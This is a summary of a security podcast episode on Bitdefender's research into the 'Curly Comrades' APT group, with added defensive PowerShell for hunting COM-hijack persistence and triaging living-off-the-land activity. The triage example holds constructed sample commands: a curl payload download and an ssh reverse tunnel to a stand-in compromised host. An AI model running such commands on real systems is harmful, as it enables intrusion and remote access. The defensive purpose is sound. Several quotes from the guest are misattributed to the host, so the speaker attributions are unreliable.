CyberWire Daily: Research Saturday
Episode Title: Sunny-side spyware
Air Date: September 27, 2025
Host: Dave Bittner (N2K Networks)
Guest: Martin Zujic, Technical Solutions Director at Bitdefender
Research Discussed: "Curly Comrades: A New Threat Actor Targeting Geopolitical Hotbeds"
Episode Overview
This episode spotlights new Bitdefender research into “Curly Comrades,” an advanced persistent threat (APT) group targeting geopolitical hotspots at the junction of Europe and Russia. Dave Bittner and Martin Zujic break down the group’s tools, tactics, and operational sophistication, with special attention to innovative persistence mechanisms and the challenges of investigating stealthy, evolving cyber adversaries.
Key Discussion Points and Insights
1. Background: Identifying and Naming the Threat Group
- Timeline & Methodology
- Bitdefender began tracking Curly Comrades in mid-2024, though their activities trace back to at least November 2023.
- Investigations covered multiple victims over several months to build a comprehensive understanding before releasing findings.
- Quote:
“It’s normal when you see [research] released, let's say, half a year later... we try to get as complete a picture as possible before we publish.”
— Dave Bittner [02:01]
- Name Origin
- The name "Curly Comrades" references both technical aspects (use of the curl.exe tool and hijacking of COM objects) and a desire not to glamorize cybercriminals.
- Quote:
“We... wanted to point out that these guys are not cool, they are cyber criminals.”
— Dave Bittner [03:28]
2. Target Geography & Motivations
- Victim Profile
- Focus on countries “geopolitically halfway between Russia and Europe” (e.g., government and judicial entities in Georgia and an energy distributor in Moldova).
- The actors leverage a wide, likely underestimated, network of legitimate but compromised websites as traffic relays.
- Attack Objective
- Long-term data exploitation and sustained access.
- Quote:
“Their focus is... judicial and government bodies in Georgia... energy distribution company in Moldova... using a large network of legitimate but compromised websites as traffic relays.”
— Dave Bittner [04:17]
3. Techniques and Intrusion Lifecycle
- Initial Access & Investigation
- The group’s entry method is unknown because of forensic gaps, a common situation in intrusion investigations.
- Activity was traced through surviving artifacts and their timestamps, establishing presence since at least November 2023.
- Pivoting from Initial Detection
- First signs were attempts to deploy an open-source "resource client" tool.
- The investigation rapidly widened as the attack scope became clear, including access through custom SOCKS5 proxy servers and the use of SSH, Stunnel, and multiple redundant tunnels for persistent access.
- Quote:
“We don’t have any insights into initial access method they used... what triggered us here is that we detected an attempt to deploy a resource client... and quickly found out this is much bigger than just some isolated action.”
— Dave Bittner [05:59]
4. Persistence and Stealth: The MUCORE Agent
- MUCORE Agent Mechanism
- A central discovery was their MUCORE Agent, a .NET program that launches PowerShell payloads and relies on a novel persistence technique.
- COM Hijacking: The agent hijacks a .NET-related COM class by registering its own server under that class’s CLSID in the Windows Registry (CLSIDs are the GUIDs under Software\Classes\CLSID that map a COM class to the DLL or executable implementing it), so that the legitimate component which instantiates the class loads the malicious payload instead.
- Stealthy Activation:
- Persistence is further obscured by abusing the Scheduled Task that belongs to the .NET Framework’s NGEN (the Native Image Generator, which pre-compiles .NET assemblies).
- That task is disabled by default and is only enabled by the system itself at unpredictable times (when the host is idle or after a .NET installation), so the malware runs on an irregular schedule that is hard to baseline and detect.
- After execution, the task disables itself again, leaving few obvious traces.
- Quote:
“Not only is it hijacking one of the COM classes... but also, how is this triggered? That’s also smart because it’s relying on the scheduled task that is disabled, but just appears to be disabled, but it actually executes.”
— Dave Bittner [13:24]
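Hunting for the persistence shape described in this section, as an added example; this is not Bitdefender’s tooling and nothing like it appears in the episode. It assumes a Windows host with Windows PowerShell 5.1 or later and the built-in ScheduledTasks module, and rests on two documented Windows behaviors: per-user COM registrations under HKCU\Software\Classes\CLSID take precedence over the machine-wide ones under HKLM, and the NGEN tasks under \Microsoft\Windows\.NET Framework\ invoke a COM handler action (a CLSID) rather than an executable, which is what makes a CLSID hijack redirect them. The function names and output fields are my own.

```powershell
# Added hunting script (not from Bitdefender or the episode). Run it as the user whose profile
# you are inspecting: the overrides it looks for live in that user's HKCU hive.

function Get-UserClsidOverrides {
    # COM activation consults HKCU\Software\Classes before HKLM\Software\Classes, so a per-user
    # CLSID key carrying an InprocServer32 (DLL) or LocalServer32 (EXE) default value shadows the
    # machine-wide server and needs no administrator rights. Per-user installs create such keys
    # legitimately, so this is a triage list, not a verdict.
    $userRoot    = 'Registry::HKEY_CURRENT_USER\Software\Classes\CLSID'
    $machineRoot = 'Registry::HKEY_LOCAL_MACHINE\Software\Classes\CLSID'
    if (-not (Test-Path -Path $userRoot)) { return }

    foreach ($clsidKey in Get-ChildItem -Path $userRoot -ErrorAction SilentlyContinue) {
        foreach ($serverType in 'InprocServer32', 'LocalServer32') {
            $userServerKey = "$($clsidKey.PSPath)\$serverType"
            if (-not (Test-Path -Path $userServerKey)) { continue }
            $userServer = (Get-ItemProperty -Path $userServerKey -ErrorAction SilentlyContinue).'(default)'

            $machineServerKey = "$machineRoot\$($clsidKey.PSChildName)\$serverType"
            $machineServer = $null
            if (Test-Path -Path $machineServerKey) {
                $machineServer = (Get-ItemProperty -Path $machineServerKey -ErrorAction SilentlyContinue).'(default)'
            }

            $disposition = 'MatchesMachine'
            if (-not $machineServer) { $disposition = 'NoMachineCounterpart' }
            elseif ($userServer -ne $machineServer) { $disposition = 'DiffersFromMachine' }

            [pscustomobject]@{
                CLSID         = $clsidKey.PSChildName
                ServerType    = $serverType
                UserServer    = $userServer
                MachineServer = $machineServer
                Disposition   = $disposition
            }
        }
    }
}

function Get-NgenTaskActions {
    # The NGEN tasks are normally Disabled and are enabled transiently by the runtime, so State
    # alone says little; LastRunTime and LastTaskResult show whether a task actually fired.
    Get-ScheduledTask -TaskPath '\Microsoft\Windows\.NET Framework\' -ErrorAction SilentlyContinue |
        Where-Object { $_.TaskName -like '*NGEN*' } |
        ForEach-Object {
            $task = $_
            $info = Get-ScheduledTaskInfo -TaskName $task.TaskName -TaskPath $task.TaskPath
            foreach ($action in $task.Actions) {
                # COM handler actions expose ClassId; Exec actions expose Execute instead.
                $classIdProp = $action.PSObject.Properties['ClassId']
                $actionType  = 'Exec'
                $target      = $action.Execute
                if ($classIdProp) { $actionType = 'ComHandler'; $target = $classIdProp.Value }
                [pscustomobject]@{
                    TaskName    = $task.TaskName
                    State       = $task.State
                    ActionType  = $actionType
                    Target      = $target
                    LastRunTime = $info.LastRunTime
                    LastResult  = $info.LastTaskResult
                }
            }
        }
}

function Find-NgenComHandlerHijacks {
    # The hijack shape: the CLSID an NGEN task invokes also has a user-hive server that differs
    # from (or has no) machine-hive counterpart. A hijack written to HKLM by an attacker with
    # admin rights would not show here; for that case, verify the machine-hive DLL's signature.
    $overrides = @(Get-UserClsidOverrides | Where-Object { $_.Disposition -ne 'MatchesMachine' })
    $handlers  = @(Get-NgenTaskActions | Where-Object { $_.ActionType -eq 'ComHandler' })
    foreach ($handler in $handlers) {
        foreach ($override in $overrides | Where-Object { $_.CLSID -eq $handler.Target }) {
            [pscustomobject]@{
                TaskName      = $handler.TaskName
                TaskState     = $handler.State
                LastRunTime   = $handler.LastRunTime
                ClassId       = $handler.Target
                UserServer    = $override.UserServer
                MachineServer = $override.MachineServer
            }
        }
    }
}

# Empty output means no user-hive override of an NGEN handler CLSID exists for this user.
Find-NgenComHandlerHijacks | Format-Table -AutoSize
```

Because the task is disabled almost all of the time, a hunt that only lists enabled tasks will miss it; the join above keys on the CLSID the task invokes, not on the task’s state. At fleet scale the same logic becomes an EDR query: registry-set events on HKCU\…\CLSID\*\InprocServer32 correlated with run events for the NGEN tasks.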
5. Advanced Tactics & Infrastructure
- Use of Legitimate Infrastructure
- Most command-and-control (C2) communications traveled through compromised, but otherwise legitimate, websites, providing cover and facilitating stealth.
- Layered proxying and multiple fallback tunnels ensured resilience and return paths for the attackers if evicted.
- Shift from Malware to “Living off the Land”
- Transition away from custom malware toward built-in system tools (LOLBins) and standard tooling (SSH, Stunnel) for persistent access and data exfiltration.
- Quote:
“They are switching less and less to use malware and... more to use normal, common binaries.”
— Dave Bittner [18:29]
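Triage logic for the living-off-the-land tooling named in this section (curl.exe, SSH, Stunnel), as an added example; it is not Bitdefender’s detection content and is not from the episode. It scores process-creation records using the Image, CommandLine and ParentImage fields that Sysmon Event ID 1 or EDR telemetry carries. The sample records, the hostnames (on the reserved .test TLD), the list of non-interactive parent processes and the function names are all constructed for illustration.

```powershell
# Added triage example (not from Bitdefender or the episode). Flags command-line shapes that
# turn ordinary binaries into download cradles, exfiltration paths and tunnels.

function Get-LolbinIndicators {
    param([Parameter(Mandatory)][pscustomobject]$Event)
    $image = [IO.Path]::GetFileName([string]$Event.Image).ToLowerInvariant()
    $cmd   = [string]$Event.CommandLine
    $hits  = @()

    switch ($image) {
        'curl.exe' {
            # Download cradle: write a remote resource to disk (-o / -O / --output).
            if ($cmd -match '(^|\s)(-o|--output|--remote-name)(\s|$)' -and $cmd -match 'https?://') {
                $hits += 'curl download to disk'
            }
            # Upload shape: request bodies or file uploads leaving the host.
            if ($cmd -match '(^|\s)(-d|--data\S*|-T|--upload-file|-F|--form)(\s|$)') {
                $hits += 'curl upload/POST'
            }
            # Certificate checks off: typical of scripted tooling talking to relays, rarely typed by admins.
            if ($cmd -match '(^|\s)(-k|--insecure)(\s|$)') { $hits += 'curl TLS verification disabled' }
        }
        'ssh.exe' {
            # -R publishes a port on the remote side that tunnels back into this host; -D opens a local SOCKS proxy.
            if ($cmd -match '(^|\s)-R\s*\S+:\S+') { $hits += 'ssh reverse tunnel (-R)' }
            if ($cmd -match '(^|\s)-D\s*\d+')     { $hits += 'ssh dynamic SOCKS forward (-D)' }
            if ($cmd -match '(^|\s)-N(\s|$)')     { $hits += 'ssh tunnel-only session (-N)' }
        }
        { $_ -like 'stunnel*.exe' } {
            $hits += 'stunnel TLS wrapper'
        }
    }

    # Any of the above launched by a service, task host or office app rather than a shell weighs more.
    $parent = [IO.Path]::GetFileName([string]$Event.ParentImage).ToLowerInvariant()
    $nonInteractiveParents = 'svchost.exe', 'taskhostw.exe', 'services.exe', 'winword.exe', 'excel.exe'
    if ($hits.Count -gt 0 -and $parent -in $nonInteractiveParents) { $hits += "non-interactive parent $parent" }
    return $hits
}

function Invoke-ProcessTriage {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $hits = @(Get-LolbinIndicators -Event $e)
        if ($hits.Count -eq 0) { continue }
        [pscustomobject]@{
            UtcTime     = $e.UtcTime
            Image       = $e.Image
            Parent      = $e.ParentImage
            Indicators  = $hits -join '; '
            CommandLine = $e.CommandLine
        }
    }
}

# Constructed sample records (illustrative, not real telemetry).
$sampleEvents = @(
    [pscustomobject]@{ UtcTime = '2025-09-01 03:12:44'; Image = 'C:\Windows\System32\curl.exe'
                       ParentImage = 'C:\Windows\System32\svchost.exe'
                       CommandLine = 'curl.exe -s -k -o C:\Users\Public\stage.dat https://compromised-site.test/wp-includes/p.php' }
    [pscustomobject]@{ UtcTime = '2025-09-01 03:13:10'; Image = 'C:\Windows\System32\OpenSSH\ssh.exe'
                       ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'ssh.exe -N -R 0.0.0.0:2222:127.0.0.1:3389 relay@compromised-site.test' }
    [pscustomobject]@{ UtcTime = '2025-09-01 03:15:02'; Image = 'C:\ProgramData\st\stunnel.exe'
                       ParentImage = 'C:\Windows\System32\services.exe'
                       CommandLine = 'stunnel.exe C:\ProgramData\st\stunnel.conf' }
    [pscustomobject]@{ UtcTime = '2025-09-01 09:40:33'; Image = 'C:\Windows\System32\curl.exe'
                       ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'curl.exe -I https://intranet.test/health' }   # benign admin check: no indicators
)

Invoke-ProcessTriage -Events $sampleEvents | Format-Table -AutoSize -Wrap
```

The fourth record is deliberately benign and produces no row: the point of scoring command-line shape and parent process, rather than the binary name, is that curl.exe and ssh.exe are legitimate on most hosts and a name-only rule is exactly the noisy alerting the episode warns about.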
6. Resilience and Operator Tactics
- Multi-pronged Persistence
- Multiple access paths, redundant tunnels, legitimate-tool use, and fallback mechanisms make defense and remediation extremely challenging.
- Operational Security
- The sophistication and scope of the infrastructure indicate a skilled, well-resourced team with a long-term operational outlook.
- Quote:
“They stayed stealthy, under the radar for a very, very long time. So yeah, it's much bigger than what we are seeing today.”
— Dave Bittner [17:30]
7. Defensive Recommendations
- EDR/XDR Deployment
- Major shortcomings in victim environments: lack of Endpoint Detection and Response (EDR/XDR), or tools generating excessive noise and leading to missed alerts.
- Operational Readiness
- Investing in security personnel and processes is as vital as tooling—alerts must be followed up by trained SOC staff or third-party responders.
- Alert Tuning & Continuous Research
- Focus on detecting suspicious behaviors, not just known malware.
- Stay current with research on new persistence tricks, LOLBin (Living Off The Land binary) abuse, and malicious use of RMM (Remote Monitoring and Management) tools.
- Quotes:
“It’s really good to think about it. It’s no longer binary, just this is bad or this is good. It’s all about percentages…”
— Dave Bittner [19:57]
“Make sure you have the tools that will highlight to you suspicious activity on the network, on endpoints, on servers, in the cloud. And also you have the people that can respond to it.”
— Dave Bittner [21:18]
“Be aware of LOLBins, be aware of RMM abuse by these directives.”
— Dave Bittner [23:22]
Notable Quotes & Memorable Moments
- On naming threat groups:
“We really wanted to find also the name that would reflect what we think about them. If it makes sense.”
— Dave Bittner [03:28]
- On the challenges of initial access investigation:
“Forensic investigation is not like in the movies, where you know exactly every single step that happened and there are no gaps. In many cases there are big gaps.”
— Dave Bittner [05:59]
- On the technical complexity and researcher frustration:
“If you’ve never been dealing with the COM object, congratulations. I spent many years fighting with the DLL hell back in my early days. So this is the stuff of nightmares.”
— Martin Zujic [08:52]
Timestamps for Important Segments
- [01:41] Introduction to Curly Comrades threat group
- [04:08] Targeted regions, sectors, and motivations
- [05:49] Attack lifecycle and investigation obstacles
- [08:42] Deep dive: Persistence via MUCORE agent and technical mechanisms
- [13:24] Detailed explanation of COM hijacking and scheduled task abuse
- [17:24] Sophistication assessment and stealth tactics
- [18:22] Resilience and living-off-the-land tactics
- [19:46] Defensive recommendations for organizations
Summary
This episode provides a meticulous breakdown of how Curly Comrades operates: focusing on stealthy persistence, innovative abuse of Windows internals, and use of legitimate infrastructure for command and control. The advanced, evasive nature of the threat underscores the continued evolution of APT operations and the critical need for organizations to pair technology with skilled personnel and continuous research to stay ahead.
The conversation is candid, technical, and rooted in practical experience, making it essential listening for defenders seeking actionable insight into modern cyber threats.